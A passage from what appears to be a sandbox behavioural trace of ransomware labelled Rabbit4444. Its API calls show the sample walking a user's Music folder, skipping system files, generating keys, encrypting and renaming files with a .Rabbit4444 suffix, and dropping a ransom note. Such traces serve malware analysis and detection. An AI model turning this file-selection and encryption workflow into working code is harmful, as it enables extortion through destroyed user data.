lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0048.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0048.969] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.969] CloseHandle (hObject=0x298) returned 1 [0048.969] CloseHandle (hObject=0x278) returned 1 [0048.974] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\J42Z.mp3.Rabbit4444") returned 41 [0048.974] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\J42Z.mp3" (normalized: "c:\\users\\fd1hvy\\music\\j42z.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\J42Z.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\j42z.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0048.975] InterlockedExchangeAdd (in: Addend=0xff618, Value=69552 | out: Addend=0xff618) returned 19048320 [0048.975] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3452 [0048.975] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae1c8c50, ftCreationTime.dwHighDateTime=0x1d4d1fb, ftLastAccessTime.dwLowDateTime=0x49ee4e50, ftLastAccessTime.dwHighDateTime=0x1d4d3b6, ftLastWriteTime.dwLowDateTime=0x49ee4e50, ftLastWriteTime.dwHighDateTime=0x1d4d3b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MK kMG3hBIR2Rc1-7xXp", cAlternateFileName="MKKMG3~1")) returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="Rabbit4444.exe") returned -1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2=".") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="..") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="windows") returned -1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="bootmgr") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="pagefile.sys") returned -1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="boot") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="ids.txt") returned 1 [0048.975] lstrcmpiW (lpString1="MK kMG3hBIR2Rc1-7xXp", lpString2="NTUSER.DAT") returned -1 [0048.975] lstrcpyW (in: lpString1=0x130eb64, lpString2="MK kMG3hBIR2Rc1-7xXp" | out: lpString1="MK kMG3hBIR2Rc1-7xXp") returned="MK kMG3hBIR2Rc1-7xXp" [0048.975] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0048.975] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115748 [0048.975] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6530 [0048.975] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a44d9a0, ftCreationTime.dwHighDateTime=0x1d4ce3a, ftLastAccessTime.dwLowDateTime=0xbbbbafd0, ftLastAccessTime.dwHighDateTime=0x1d4d40d, ftLastWriteTime.dwLowDateTime=0xbbbbafd0, ftLastWriteTime.dwHighDateTime=0x1d4d40d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ps7z1Y", cAlternateFileName="")) returned 1 [0048.975] lstrcmpiW (lpString1="Ps7z1Y", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.975] lstrcmpiW (lpString1="Ps7z1Y", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="Rabbit4444.exe") returned -1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2=".") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="..") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="windows") returned -1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="bootmgr") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="pagefile.sys") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="boot") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="ids.txt") returned 1 [0048.976] lstrcmpiW (lpString1="Ps7z1Y", lpString2="NTUSER.DAT") returned 1 [0048.976] lstrcpyW (in: lpString1=0x130eb64, lpString2="Ps7z1Y" | out: lpString1="Ps7z1Y") returned="Ps7z1Y" [0048.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0048.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0x114b80 [0048.976] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6430 [0048.976] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55a31a00, ftCreationTime.dwHighDateTime=0x1d4c7fe, ftLastAccessTime.dwLowDateTime=0x58b40e70, ftLastAccessTime.dwHighDateTime=0x1d4cf9c, ftLastWriteTime.dwLowDateTime=0x58b40e70, ftLastWriteTime.dwHighDateTime=0x1d4cf9c, nFileSizeHigh=0x0, nFileSizeLow=0x114dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Z19.mp3", cAlternateFileName="")) returned 1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="Rabbit4444.exe") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2=".") returned 1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="..") returned 1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="windows") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="bootmgr") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="pagefile.sys") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="boot") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="ids.txt") returned -1 [0048.976] lstrcmpiW (lpString1="_Z19.mp3", lpString2="NTUSER.DAT") returned -1 [0048.976] lstrcpyW (in: lpString1=0x130eb64, lpString2="_Z19.mp3" | out: lpString1="_Z19.mp3") returned="_Z19.mp3" [0048.976] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_Z19.mp3", dwFileAttributes=0x0) returned 1 [0048.976] lstrlenW (lpString="_Z19.mp3") returned 8 [0048.976] lstrlenW (lpString="Rabbit4444") returned 10 [0048.976] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.977] lstrlenW (lpString=".dll") returned 4 [0048.977] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0048.977] lstrlenW (lpString=".lnk") returned 4 [0048.977] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0048.977] lstrlenW (lpString=".ini") returned 4 [0048.977] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0048.977] lstrlenW (lpString=".sys") returned 4 [0048.977] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0048.977] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_Z19.mp3" (normalized: "c:\\users\\fd1hvy\\music\\_z19.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.977] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.977] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14028762627) returned 1 [0048.977] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70877) returned 1 [0048.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0048.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.977] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x117e0, lpName=0x0) returned 0x298 [0048.977] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x117e0) returned 0x70000 [0048.979] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x1016b0) returned 1 [0048.979] CryptGenRandom (in: hProv=0x1016b0, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0048.979] CryptReleaseContext (hProv=0x1016b0, dwFlags=0x0) returned 1 [0048.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.980] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14029078196) returned 1 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0048.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.980] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.981] CloseHandle (hObject=0x298) returned 1 [0048.981] CloseHandle (hObject=0x278) returned 1 [0048.983] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\_Z19.mp3.Rabbit4444") returned 41 [0048.983] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\_Z19.mp3" (normalized: "c:\\users\\fd1hvy\\music\\_z19.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\_Z19.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\_z19.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0048.984] InterlockedExchangeAdd (in: Addend=0xff618, Value=70880 | out: Addend=0xff618) returned 19117872 [0048.984] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3455 [0048.984] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55a31a00, ftCreationTime.dwHighDateTime=0x1d4c7fe, ftLastAccessTime.dwLowDateTime=0x58b40e70, ftLastAccessTime.dwHighDateTime=0x1d4cf9c, ftLastWriteTime.dwLowDateTime=0x58b40e70, ftLastWriteTime.dwHighDateTime=0x1d4cf9c, nFileSizeHigh=0x0, nFileSizeLow=0x114dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Z19.mp3", cAlternateFileName="")) returned 0 [0048.984] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.984] lstrcpyW (in: lpString1=0x130eb64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.984] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.984] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.984] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.986] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.986] CloseHandle (hObject=0x278) returned 1 [0048.986] CloseHandle (hObject=0x27c) returned 1 [0048.987] GetCurrentThreadId () returned 0xd98 [0048.987] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0048.987] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y" [0048.987] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114b80 | out: hHeap=0xe0000) returned 1 [0048.987] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0048.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y" [0048.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\" [0048.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\.BFC0E91B00AE8A0620D3" [0048.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.988] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.991] FlushFileBuffers (hFile=0x27c) returned 1 [0048.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.992] CloseHandle (hObject=0x27c) returned 1 [0048.992] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\Ps7z1Y") returned 28 [0048.992] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a44d9a0, ftCreationTime.dwHighDateTime=0x1d4ce3a, ftLastAccessTime.dwLowDateTime=0xbbbbafd0, ftLastAccessTime.dwHighDateTime=0x1d4d40d, ftLastWriteTime.dwLowDateTime=0xe68620f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0048.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.993] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.993] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a44d9a0, ftCreationTime.dwHighDateTime=0x1d4ce3a, ftLastAccessTime.dwLowDateTime=0xbbbbafd0, ftLastAccessTime.dwHighDateTime=0x1d4d40d, ftLastWriteTime.dwLowDateTime=0xe68620f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.993] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.993] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.993] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.993] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe68620f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe68620f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe68620f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb3abf0, ftCreationTime.dwHighDateTime=0x1d4cbf2, ftLastAccessTime.dwLowDateTime=0x81984330, ftLastAccessTime.dwHighDateTime=0x1d4c78e, ftLastWriteTime.dwLowDateTime=0x81984330, ftLastWriteTime.dwHighDateTime=0x1d4c78e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0S8C98Izi8QyG", cAlternateFileName="0S8C98~1")) returned 1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="Rabbit4444.exe") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2=".") returned 1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="..") returned 1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="windows") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="bootmgr") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="pagefile.sys") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="boot") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="ids.txt") returned -1 [0048.993] lstrcmpiW (lpString1="0S8C98Izi8QyG", lpString2="NTUSER.DAT") returned -1 [0048.993] lstrcpyW (in: lpString1=0x130eb72, lpString2="0S8C98Izi8QyG" | out: lpString1="0S8C98Izi8QyG") returned="0S8C98Izi8QyG" [0048.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0048.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x1158c8 [0048.994] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6430 [0048.994] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69eddcf0, ftCreationTime.dwHighDateTime=0x1d4c77e, ftLastAccessTime.dwLowDateTime=0xb53e4f50, ftLastAccessTime.dwHighDateTime=0x1d4d40d, ftLastWriteTime.dwLowDateTime=0xb53e4f50, ftLastWriteTime.dwHighDateTime=0x1d4d40d, nFileSizeHigh=0x0, nFileSizeLow=0xed63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DFuSzaknIrmv.wav", cAlternateFileName="DFUSZA~1.WAV")) returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="Rabbit4444.exe") returned -1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2=".") returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="..") returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="windows") returned -1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="bootmgr") returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="pagefile.sys") returned -1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="boot") returned 1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="ids.txt") returned -1 [0048.994] lstrcmpiW (lpString1="DFuSzaknIrmv.wav", lpString2="NTUSER.DAT") returned -1 [0048.994] lstrcpyW (in: lpString1=0x130eb72, lpString2="DFuSzaknIrmv.wav" | out: lpString1="DFuSzaknIrmv.wav") returned="DFuSzaknIrmv.wav" [0048.994] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\DFuSzaknIrmv.wav", dwFileAttributes=0x0) returned 1 [0048.994] lstrlenW (lpString="DFuSzaknIrmv.wav") returned 16 [0048.994] lstrlenW (lpString="Rabbit4444") returned 10 [0048.994] lstrcmpiW (lpString1="knIrmv.wav", lpString2="Rabbit4444") returned -1 [0048.994] lstrlenW (lpString=".dll") returned 4 [0048.994] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0048.994] lstrlenW (lpString=".lnk") returned 4 [0048.994] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0048.994] lstrlenW (lpString=".ini") returned 4 [0048.994] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0048.994] lstrlenW (lpString=".sys") returned 4 [0048.994] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0048.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\DFuSzaknIrmv.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\dfuszaknirmv.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.995] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.995] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14030537968) returned 1 [0048.995] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=60771) returned 1 [0048.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0048.995] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf070, lpName=0x0) returned 0x298 [0048.995] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf070) returned 0x70000 [0048.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.997] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14030809827) returned 1 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0048.997] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.998] CloseHandle (hObject=0x298) returned 1 [0048.998] CloseHandle (hObject=0x278) returned 1 [0049.001] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\DFuSzaknIrmv.wav.Rabbit4444") returned 56 [0049.001] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\DFuSzaknIrmv.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\dfuszaknirmv.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\DFuSzaknIrmv.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\dfuszaknirmv.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.002] InterlockedExchangeAdd (in: Addend=0xff618, Value=60784 | out: Addend=0xff618) returned 19188752 [0049.002] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3458 [0049.002] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c27570, ftCreationTime.dwHighDateTime=0x1d4ce99, ftLastAccessTime.dwLowDateTime=0x999e18a0, ftLastAccessTime.dwHighDateTime=0x1d4ccbc, ftLastWriteTime.dwLowDateTime=0x999e18a0, 